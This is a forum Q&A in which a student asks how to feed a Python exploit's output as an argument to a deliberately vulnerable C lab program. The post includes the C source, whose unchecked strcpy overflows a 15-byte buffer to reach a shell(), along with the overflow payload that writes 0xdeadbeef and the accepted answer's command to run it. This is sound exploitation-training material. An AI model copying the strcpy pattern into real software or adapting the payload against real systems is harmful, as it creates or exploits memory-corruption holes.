# How is stdout piped in to a file located in a different directory?

Tags: directory, pipe

I want to pipe the stdout of my python file `exploit1.py` to be accepted as a command line argument of a C executable `lab2C.c`. My intention is to overflow the char buffer in `lab2C.c` so that the memory leaks in to `int set_me`. This will cause conditional statement located in main() to call the shell() function even though I did not enter either of the correct passwords.

The problem is that `exploit1.py` and `lab2C.c` are located in two different directories that do not belong to the same local path. `exploit1.py` is located in `/tmp`. `lab2C` and `lab2C.c` are located in `/levels/lab02`. How do I pipe the stdout of `exploit1.py` to be accepted as a main function parameter of `lab2C`?

Here are the two files for reference:

exploit1.py:

```
def main():

    print("aaabbbcccdddeee\xef\xbe\xad\xde")

main()
```

lab2C.c:

```
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void shell()
{
        printf("You did it.\n");
        system("/bin/sh");
}

int main(int argc, char** argv){
    if(argc != 2)
    {
            printf("usage:\n%s string\n", argv[0]);
            return EXIT_FAILURE;
    }

    int set_me = 0;
    char buf[15];
    strcpy(buf, argv[1]);

    if(set_me == 0xdeadbeef)
    {
            shell();
    }
    else
    {
            printf("Not authenticated.\nset_me was %d\n", set_me);
    }

    return EXIT_SUCCESS;
}
```

Answer (score 3, accepted):

Your C program does not read from standard input, so nothing can be piped to it. It expects command line arguments though, so you'd have to invoke it as

```
/levels/lab02/lab2C.exe "$(python /tmp/exploit1.py)"
```

If you are currently located in `/levels/lab02`, then this may be shortened to

```
./lab2C.exe "$(python /tmp/exploit1.py)"
```

Note that it's uncommon to give executable files the `.exe` suffix on Unix. You also have errors in your code (a buffer overrun, and missing headers), and the string in the Python code does not do what you think it does (the slashes should probably be backslashes).